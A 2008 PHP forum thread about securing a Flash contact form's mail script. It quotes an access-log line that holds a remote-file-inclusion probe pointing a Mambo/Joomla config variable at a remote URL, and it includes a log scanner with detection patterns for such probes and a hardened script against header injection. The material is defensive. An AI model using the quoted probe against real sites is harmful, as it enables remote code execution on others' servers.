
My server security



Hello :)

On my index page I have a contact form made in Flash with a simple script file to send me the comments... I also have this guy who is trying to exploit my site for some reason..

Please, please, please can someone tell me how I can add code to my PHP script that will look for invalid parameters and redirect him off somewhere else...?

My log shows what is below:

209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008

Many Thanks

Martin

Link to comment
https://forums.phpfreaks.com/topic/106444-my-server-security/
Share on other sites
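Added example, not from the thread: an offline scan of access-log lines like the one above for the markers of that request. It is a register_globals / remote file inclusion probe aimed at Mambo and Joomla installations (superglobals set through the query string, and the mosConfig_absolute_path include variable pointed at a remote URL); it never reaches the mail script. The two extra log lines are constructed.

```php
<?php
// Added example (not the thread's code): flag register_globals / remote-file-inclusion
// probes in Apache access-log lines. First sample line is the one from the post;
// the other two are constructed benign traffic.
$sampleLog = <<<'LOG'
209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
192.0.2.10 - - [20/May/2008:02:25:40 +0200] "GET /index.php HTTP/1.1" 200 4008
192.0.2.11 - - [20/May/2008:02:26:01 +0200] "POST /feedback.php HTTP/1.1" 200 312
LOG;

// Indicators: a query-string key that names a PHP superglobal (register_globals abuse),
// a Mambo/Joomla config-override key, or any parameter value that is itself a URL.
function classifyRequest(string $query): array
{
    $reasons = [];
    parse_str($query, $params); // decodes and nests _REQUEST[option] into $params['_REQUEST']
    foreach ($params as $key => $value) {
        if (preg_match('/^(_REQUEST|_GET|_POST|_COOKIE|_SERVER|_FILES|GLOBALS)$/', $key)) {
            $reasons[] = "superglobal key: $key";
        } elseif (stripos($key, 'mosConfig_') === 0) {
            $reasons[] = "config override key: $key";
        }
        if (is_string($value) && preg_match('#^(https?|ftp)://#i', $value)) {
            $reasons[] = "URL in value of $key";
        }
    }
    return $reasons;
}

function scanAccessLog(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // client IP ... [timestamp] "METHOD /path?query PROTOCOL"
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) ([^\s?"]+)(?:\?([^\s"]*))? [^"]*"/', $line, $m)) {
            continue;
        }
        $m += [4 => ''];                      // group 4 is absent when there is no query string
        $reasons = classifyRequest($m[4]);
        if ($reasons) {
            $hits[] = ['ip' => $m[1], 'path' => $m[3], 'reasons' => $reasons];
        }
    }
    return $hits;
}

foreach (scanAccessLog($sampleLog) as $hit) {
    printf("%s %s: %s\n", $hit['ip'], $hit['path'], implode('; ', $hit['reasons']));
}
```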

Here are the contents of my script...

<?php
// initialize variables for To and Subject fields
$to = '[email protected]';
$subject = 'Enquiry';

// build message body from variables received in the POST array
$message = 'From: '.$_POST['firstname']."\n\n";
$message .= 'Email: '.$_POST['email']."\n\n";
$message .= 'Enquiry: '.$_POST['enquiry']."\n\n";

// add additional email headers for more user-friendly reply
$additionalHeaders = "From: Martin<[email protected]>\n";
$additionalHeaders .= "Reply-To:$_POST";

//send email message
$OK = mail($to, $subject, $message, $additionalHeaders);
?>

Thanks again..


I don't see how

209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008

relates to that mail script!

Try this, post the debug info and I'll adapt the script to suit:

<?php
//Debug:
echo "DEBUG: GET";
echo count($_GET);
echo "<br>Post";
print_r($_POST);
echo "<br>End Debug";
//End debug

//the if below will need to be updated depending on the debug info.
if (count($_GET) > 0 || count($_POST) != 3)
{
    die("Bad Parameters");
}

if (empty($_POST['firstname']) || empty($_POST['email']) || empty($_POST['enquiry']))
{
    die("Missing Parameters");
}

// D modifier: "$" must not match before a trailing newline, so a line break can't slip through
if (!preg_match('/^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/iD', $_POST['email']))
{
    die("Invalid Email");
}

// initialize variables for To and Subject fields
$to = '[email protected]';
$subject = 'Enquiry';

// build message body from variables received in the POST array
$message = 'From: '.$_POST['firstname']."\n\n";
$message .= 'Email: '.$_POST['email']."\n\n";
$message .= 'Enquiry: '.$_POST['enquiry']."\n\n";

// add additional email headers for more user-friendly reply
$additionalHeaders = "From: Martin<[email protected]>\n";
$additionalHeaders .= "Reply-To:{$_POST['email']}"; //bug fix

//send email message
$OK = mail($to, $subject, $message, $additionalHeaders);
?>


I used the file containing the debug information but the email did not send. When I switched it back it did.. I have an SMTP server set up with only itself allowed to send emails, maybe the exploit is directly from the index.php page and not the form script (feedback.php)?

(Please note the index.php file doesn't contain code, it just contains the Flash document which passes the variables to the script)

I'm sorry, I know this is a pain! Argh!


If index.php doesn't contain any PHP then it could be .html, but personally I would keep it .php (you may add code to it later).

I used the file containing the debug information but the email did not send

I expected that, but the page should have displayed some debug data.


Okay, just remove this:

 

//Debug: 
echo "DEBUG: GET";
echo count($_GET);
echo "<br>Post";
print_r($_POST);
echo "<br>End Debug";
//End debug

//the if below will need to be updated depending on the debug info.
if(count($_GET) >0 || count($_POST) != 3)
{
die("Bad Parameters");
}

 

The rest should be fine.


Full script:

<?php
if (empty($_POST['firstname']) || empty($_POST['email']) || empty($_POST['enquiry']))
{
    die("Missing Parameters");
}

// D modifier: "$" must not match before a trailing newline, so a line break can't slip through
if (!preg_match('/^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/iD', $_POST['email']))
{
    die("Invalid Email");
}

// initialize variables for To and Subject fields
$to = '[email protected]';
$subject = 'Enquiry';

// build message body from variables received in the POST array
$message = 'From: '.$_POST['firstname']."\n\n";
$message .= 'Email: '.$_POST['email']."\n\n";
$message .= 'Enquiry: '.$_POST['enquiry']."\n\n";

// add additional email headers for more user-friendly reply
$additionalHeaders = "From: Martin<[email protected]>\n";
$additionalHeaders .= "Reply-To:{$_POST['email']}"; //bug fix

//send email message
$OK = mail($to, $subject, $message, $additionalHeaders);
?>

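Added example, not the thread's code: a hardened feedback.php in the same spirit as the script above. It whitelists the three expected POST fields, rejects any query string (the only way the probe from Martin's log arrives), refuses CR/LF in values that end up in mail headers, validates the address with filter_var, and answers tampering with a 400 and a server-side log entry rather than a redirect. MAILBOX and the field length limits are assumptions.

```php
<?php
// Added example, not the thread's code: a hardened feedback.php. Assumes the Flash form
// POSTs exactly firstname, email and enquiry; MAILBOX stands in for the redacted address.
const ALLOWED_FIELDS = ['firstname' => 80, 'email' => 254, 'enquiry' => 4000]; // max bytes
const MAILBOX = 'you@example.com';

// Returns ['fields' => [...]] on success or ['errors' => [...]] on any problem.
function validateEnquiry(array $post, array $get): array
{
    $errors = [];
    $clean  = [];
    // The form never sends a query string; any GET parameter is a probe, not a visitor.
    if ($get) {
        $errors[] = 'unexpected query string';
    }
    // Unexpected POST keys are treated as tampering rather than silently dropped.
    foreach (array_keys(array_diff_key($post, ALLOWED_FIELDS)) as $extra) {
        $errors[] = "unexpected parameter: $extra";
    }
    foreach (ALLOWED_FIELDS as $field => $maxLen) {
        $value = $post[$field] ?? '';
        if (!is_string($value) || trim($value) === '') {
            $errors[] = "missing parameter: $field";
        } elseif (strlen($value) > $maxLen) {
            $errors[] = "$field too long";
        } elseif ($field !== 'enquiry' && preg_match('/[\r\n]/', $value)) {
            // A CR/LF in a value that reaches a mail header starts a new header line
            // (header injection); only the enquiry body may keep its line breaks.
            $errors[] = "line break in $field";
        } else {
            $clean[$field] = $value;
        }
    }
    if (isset($clean['email']) && filter_var($clean['email'], FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'invalid email';
    }
    return $errors ? ['errors' => $errors] : ['fields' => $clean];
}
$result = validateEnquiry($_POST, $_GET);
if (isset($result['errors'])) {
    // Record the details server-side; the client learns only that it was rejected.
    error_log('feedback.php rejected ' . ($_SERVER['REMOTE_ADDR'] ?? '-') . ': ' . implode('; ', $result['errors']));
    http_response_code(400);
    exit('Bad request');
}
$f = $result['fields'];
$message = "From: {$f['firstname']}\n\nEmail: {$f['email']}\n\nEnquiry: {$f['enquiry']}\n";
$headers = 'From: Martin <' . MAILBOX . ">\r\nReply-To: {$f['email']}\r\n";
mail(MAILBOX, 'Enquiry', $message, $headers);
```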
